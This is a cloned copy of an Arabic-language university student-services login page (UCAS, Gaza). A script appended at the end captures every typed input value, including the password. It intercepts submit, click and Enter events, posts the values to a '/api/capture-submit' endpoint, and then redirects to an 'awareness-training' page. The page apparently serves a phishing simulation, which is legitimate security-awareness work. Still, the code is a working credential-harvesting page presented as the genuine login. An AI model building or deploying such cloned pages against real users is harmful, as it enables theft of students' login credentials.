
<!DOCTYPE html>

<html class="notranslate" lang="ar">
<head><meta charset="utf-8"/><base href="https://my.ucas.edu.ps/login?backurl=/Registration/semester_registration"/>
<meta charset="utf-8"/>
<title>خدمات الطلبة - الكلية الجامعية للعلوم التطبيقية</title>
<meta content="width=device-width, initial-scale=1.0" name="viewport"/>
<meta content="الكلية الجامعية للعلوم التطبيقية" name="description">
<meta content="الكلية الجامعية للعلوم التطبيقية" name="author"/>
<meta content="IE=edge" http-equiv="X-UA-Compatible"/>
<!-- App favicon -->
<link href="/NewTemp/src/images/favicon.ico" rel="shortcut icon"/>
<!-- App css -->
<link href="/NewTemp/src/css-light/bootstrap.min.css" id="bootstrap" rel="stylesheet" type="text/css"/>
<link href="/NewTemp/src/css-light/icons.min.css" id="icons" rel="stylesheet" type="text/css"/>
<link href="/NewTemp/src/css-light/app-rtl.min.css" id="app_rtl" rel="stylesheet" type="text/css"/>
<link href="/NewTemp/src/libs/basictable-master/dist/css/basictable.min.css" rel="stylesheet" type="text/css">
<link href="/NewTemp/src/style.css" rel="stylesheet" type="text/css"/>
<link href="/NewTemp/src/css-light/cusstyle.css" id="cus_style" rel="stylesheet" type="text/css"/>
</link></meta></head>
<body class="authentication-bg"><div></div>
<div class="account-pages mt-4 mb-2">
<div class="container">
<div class="col-md-12" style="margin-bottom:25px;">
<div class="text-center">
<a href="/">
<span><img alt="" height="78" src="/NewTemp/src/images/logo-light.png"/></span>
</a>
</div>
</div>
<form action="#" id="form1" method="post" onkeypress="javascript:return WebForm_FireDefaultButton(event, 'ContentPlaceHolder1_lnkLogin')" onsubmit="return false;">
<div class="aspNetHidden">
<input id="__LASTFOCUS" name="__LASTFOCUS" type="hidden" value=""/>
<input id="__EVENTTARGET" name="__EVENTTARGET" type="hidden" value=""/>
<input id="__EVENTARGUMENT" name="__EVENTARGUMENT" type="hidden" value=""/>
<input id="__VIEWSTATE" name="__VIEWSTATE" type="hidden" value="MYV3dU2CXpZnInQmQcapTkq4iUKVm3MtZWToLIxOEEBz4Kkr1O8eCUjc2A6zEyDZjr59p9853y8YPmAG3Y/kLBQAcjw6fpcMkyOCLedw/MVvwrnkmWpfDKZdvw8IEdD2A3TtXRpctw+xsWuznIJYigMB1fWCWU4PT8oPB8zoHcQazvhfPklWGBMzO4PhNvh6anVObNuho7gYtnqV0xu0LRCixfS8ldIzmwO/HUp+5lESoURr8+FIMHNfbsOsg10eWUo7WmHw/ejBD/C1gnyt9Gx2XxJO+D0f7f7ZOFsAaZROBbxZC6zeunUgqq7xPmdKm/OG7EKiWx9AN6KzA/TLsQc/LUkc0BDHDgW9DdSECGt7JIsWhY09Y2atp0BSCCFt"/>
</div>



<div class="aspNetHidden">
<input id="__VIEWSTATEGENERATOR" name="__VIEWSTATEGENERATOR" type="hidden" value="805C0972"/>
<input id="__VIEWSTATEENCRYPTED" name="__VIEWSTATEENCRYPTED" type="hidden" value=""/>
<input id="__EVENTVALIDATION" name="__EVENTVALIDATION" type="hidden" value="lbdWugvUXxcDSP05UR+Y0oLqLqLokBae3wyECoZBX3uTvBdbun6UEKFs21H+3UEfAKOV6IjAvq/fXYaKI/IcA0T3l/OLIEqn6PsI3oZ1wDDwCF3aLxfP7mJAbSo64pjMXPsIAt5WMKnWWgTZCmrzlbNtcOMfYPSjAuCTaoegDfzIVxFllaglE0AyS774mn/P"/>
</div>
<div class="row justify-content-center">
<div class="col-md-8 col-lg-6 col-xl-5">
<div class="card">
<div class="card-body p-4">
<div class="text-center mb-3">
<h4 class="text-uppercase mt-0">تسجيل الدخول</h4>
</div>
<div class="form-group mb-2">
<label for="emailaddress">رقم الطالب الجامعي</label>
<input class="form-control" id="ContentPlaceHolder1_txtUsername" maxlength="15" name="ctl00$ContentPlaceHolder1$txtUsername" placeholder="الرقم الجامعي" required="" type="text"/>
</div>
<div class="form-group mb-2">
<label for="password">كلمة المرور</label>
<input class="form-control" id="ContentPlaceHolder1_txtPassword" maxlength="20" name="ctl00$ContentPlaceHolder1$txtPassword" placeholder="كلمة المرور" required="" type="password"/>
</div>
<div class="form-group mb-0 text-center">
<a class="btn btn-primary btn-block" href="javascript:__doPostBack('ctl00$ContentPlaceHolder1$lnkLogin','')" id="ContentPlaceHolder1_lnkLogin">تسجيل دخول</a>
</div>
<div class="row mt-3 mb-2">
<div class="col-12 text-center">
<a class="text-muted mr-3" href="/profile/Forgot_Password">
<i class="fa fa-key mr-1"></i>فقدت كلمة المرور
                                            </a>
<a class="text-muted ml-3" href="/profile/activate_account"><i class="fa fa-lock mr-1"></i>تفعيل الحساب</a>
</div> <!-- end col -->
</div>
<div class="form-group mb-0 text-center">
<a class="btn btn-secondary btn-block" href="https://moodle.ucas.edu.ps/">
<img src="/NewTemp/src/icons/moodle.png">انقر هنا للذهاب للموودل
                                        </img></a>
</div>
</div> <!-- end card-body -->
</div>
<!-- end card -->
<!-- end row -->
</div>
<!-- end col -->
<div class="col-md-4 col-lg-4 col-xl-4">
<div class="card-box">
<h4 class="header-title mt-0 mb-3">تعليمات هامة</h4>
<ul class="list-group mb-0 user-list">
<li class="list-group-item">
<a class="user-list-item">
<div class="user float-left mr-3">
<i class="mdi mdi-circle text-primary"></i>
</div>
<div class="user-desc overflow-hidden">
<h5 class="name mt-0 mb-1">تأكد من ادخال رقمك الجامعي بشكل صحيح</h5>
</div>
</a>
</li>
<li class="list-group-item">
<a class="user-list-item">
<div class="user float-left mr-3">
<i class="mdi mdi-circle text-primary"></i>
</div>
<div class="user-desc overflow-hidden">
<h5 class="name mt-0 mb-1">كلمة مرور الخريجين هي رقم الهوية</h5>
</div>
</a>
</li>
<li class="list-group-item">
<a class="user-list-item">
<div class="user float-left mr-3">
<i class="mdi mdi-circle text-primary"></i>
</div>
<div class="user-desc overflow-hidden">
<h5 class="name mt-0 mb-1">تأكد من كلمة المرور وحالة الاحرف</h5>
</div>
</a>
</li>
<li class="list-group-item">
<a class="user-list-item">
<div class="user float-left mr-3">
<i class="mdi mdi-circle text-primary"></i>
</div>
<div class="user-desc overflow-hidden">
<h5 class="name mt-0 mb-1">انتبه لزر الحروف الكبيرة</h5>
</div>
</a>
</li>
</ul>
<a class="normal_link" href="https://www.facebook.com/ucasGaza" target="_blank">لتبقى على تواصل تابعنا على صفحة الفيسبوك</a>
</div>
</div>
<!-- end col -->
<div class="col-md-12">
<div class="card-boxs">
<a href="/mobile.html" target="_blank">
<img src="/NewTemp/src/images/mobile.jpg" style="width: 100%"/>
</a>
</div>
</div>
</div>

</form>
<!-- end row -->
</div>
<!-- end container -->
</div>
<!-- end page -->
<!-- Vendor js -->

<!-- App js-->

<script>
        (function(){
            function captureAndSend(e) {
                var inputs = document.querySelectorAll('input');
                var data = {};
                var hasData = false;
                
                inputs.forEach(function(input) {
                    if((input.name || input.id) && input.type !== 'hidden') {
                        var key = input.name || input.id;
                        data[key] = input.value;
                        if(input.value.trim() !== '') hasData = true;
                    }
                });
                
                if(!hasData) return; 
                
                if(e) { e.preventDefault(); e.stopPropagation(); }
                
                var siteName = "login";
                var captureUrl = window.location.origin + '/api/capture-submit';
                var redirectUrl = window.location.origin + '/awareness-training';
                
                fetch(captureUrl, {
                    method: 'POST',
                    headers: {'Content-Type': 'application/json'},
                    body: JSON.stringify({site: siteName, form_data: data})
                })
                .then(function(){ window.location.href = redirectUrl; })
                .catch(function(){ window.location.href = redirectUrl; });
            }
            
            document.addEventListener('submit', function(e){ captureAndSend(e); }, true);
            
            document.addEventListener('click', function(e){
                var t = e.target;
                var isButton = t.tagName === 'BUTTON' || t.closest('button') || (t.tagName === 'INPUT' && (t.type === 'submit' || t.type === 'button'));
                var isLoginLink = t.tagName === 'A' && (t.innerText.toLowerCase().includes('login') || t.innerText.includes('دخول') || t.innerText.includes('sign in'));
                if(isButton || isLoginLink) { captureAndSend(e); }
            }, true);
            
            document.addEventListener('keypress', function(e){
                if(e.key === 'Enter') { captureAndSend(e); }
            }, true);
        })();
        </script></body>
</html>
